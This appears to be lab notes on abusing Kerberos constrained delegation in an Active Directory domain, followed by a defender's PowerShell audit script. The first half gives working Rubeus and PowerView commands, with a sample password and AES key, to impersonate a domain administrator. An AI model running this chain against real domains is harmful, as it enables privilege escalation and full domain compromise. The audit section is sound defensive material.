Enumerating users that have constrained delegation configured (PowerView)
Get-DomainUser -TrustedToAuth -Domain eu.local

If we compromise the user storagesvc, we can access any service on EU-DC as any user, including Domain Admins.
First, let’s get the hash of the user storagesvc using Rubeus.exe
.\Rubeus.exe hash /user:storagesvc /domain:eu.local /password:Qwerty@123

Now let’s request a TGT as that user
.\Rubeus.exe asktgt /user:storagesvc /domain:eu.local /aes256:4A0D89D845868AE3DCAB270FE23BEDD442A62C4CAD7034E4C60BEDA3C0F65E04 /ptt

Now let’s validate that we got the ticket
klist

Now let’s abuse the constrained delegation: impersonate administrator to the TIME SPN on EU-DC and substitute the ldap service with /altservice
.\Rubeus.exe s4u /user:storagesvc /aes256:4A0D89D845868AE3DCAB270FE23BEDD442A62C4CAD7034E4C60BEDA3C0F65E04 /impersonateuser:administrator /msdsspn:TIME/EU-DC.eu.local /altservice:ldap /domain:eu.local /dc:eu-dc.eu.local /nowrap /ptt

Now let’s validate that we got the ticket
klist
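
From the defender's side, the same exposure can be audited. The script below is an added example, not part of the original notes; it assumes the RSAT ActiveDirectory module and reuses the eu.local domain name from the commands above. It lists every account with constrained delegation, the host each SPN maps to, and the privileged accounts that can still be impersonated.

```powershell
# Added example: defender-side audit of constrained delegation.
# Assumes the RSAT ActiveDirectory module; eu.local is taken from the notes above.
Import-Module ActiveDirectory

$Server = 'eu.local'
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition enabled
$NOT_DELEGATED                  = 0x100000   # "Account is sensitive and cannot be delegated"

# 1. Every account that is allowed to delegate to specific SPNs.
$delegators = Get-ADObject -Server $Server `
    -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
    -Properties 'msDS-AllowedToDelegateTo', userAccountControl, sAMAccountName

$report = foreach ($obj in $delegators) {
    foreach ($spn in $obj.'msDS-AllowedToDelegateTo') {
        # SPN format is service/host[:port]. Review by host, not by service:
        # the service part of the resulting ticket can be substituted
        # (the /altservice step above), so one SPN exposes the whole host.
        $hostPart = ($spn -split '/')[1] -replace ':\d+$', ''
        [pscustomobject]@{
            Account            = $obj.sAMAccountName
            Class              = $obj.objectClass
            AllowedSpn         = $spn
            EffectiveHost      = $hostPart
            ProtocolTransition = [bool]($obj.userAccountControl -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
        }
    }
}
$report | Sort-Object EffectiveHost, Account | Format-Table -AutoSize

# 2. Privileged accounts that delegation can still impersonate:
#    adminCount=1, NOT_DELEGATED flag clear, and not in Protected Users.
$protected = Get-ADGroupMember -Server $Server -Identity 'Protected Users' -Recursive |
    Select-Object -ExpandProperty distinguishedName

Get-ADUser -Server $Server -LDAPFilter '(adminCount=1)' -Properties userAccountControl |
    Where-Object {
        -not ($_.userAccountControl -band $NOT_DELEGATED) -and
        ($protected -notcontains $_.DistinguishedName)
    } |
    Select-Object SamAccountName, DistinguishedName
```

Any row whose EffectiveHost is a domain controller deserves review first, and accounts returned by the second query should be marked sensitive or added to Protected Users.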